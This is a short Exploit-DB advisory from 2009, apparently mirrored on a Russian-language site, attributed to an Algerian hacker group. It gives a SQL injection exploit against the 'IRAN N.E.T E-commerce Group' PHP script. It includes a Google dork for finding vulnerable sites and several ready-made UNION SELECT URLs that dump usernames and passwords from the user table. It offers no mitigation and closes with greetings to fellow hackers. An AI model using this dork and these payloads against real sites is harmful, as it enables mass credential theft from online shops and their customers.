- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 10350
- Проверка EDB
-
- Пройдено
- Автор
- DR.0RYX & CR3W-DZ
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2009-12-08
Код:
ALGERIAN HACKER
**********************- NORTH-AFRICA SECURITY TEAM -***********************
[!] IRAN N.E.T E-commerce Group SQL Injection Vulnerability
[!] Author : Dr.0rYX and Cr3w-DZ
[!] MAIL : vx3@hotmail.de & Cr3w@hotmail.de
***************************************************************************/
[ Software Information ]
[+] Vendor : http://iranmc.org
[+] script : IRAN N.E.T E-commerce Group SQL Injection Vulnerability
[+] Download : http://iranmc.org/index.php?id=7 sell (script with hosting)
[+] Vulnerability : SQL injection
[+] Dork :inurl:"zcat.php?id="
**************************************************************************/
[ Vulnerable File ]
http://server/zcat.php?id=[N.A.S.T ]
[ Exploit ]
http://server/zcat.php?id=-1+union+select+1,2,concat(user,char(58),pass),4,5+from+user
http://server/cat.php?id=-3+union+select+1,group_concat(id,0x3a,user,0x3a,pass),3,4+from+user
[ ExOMPLE ]
http://server/zcat.php?id=-64+union+select+1,2,concat%28user,char%2858%29,pass%29,4,5+from+user
[ GReet ]
[+] :xcv-dz , CLAW , LE0N , hacker.ps , exploit-db.com , ALL HACKERS MUSLIMS- Источник
- www.exploit-db.com
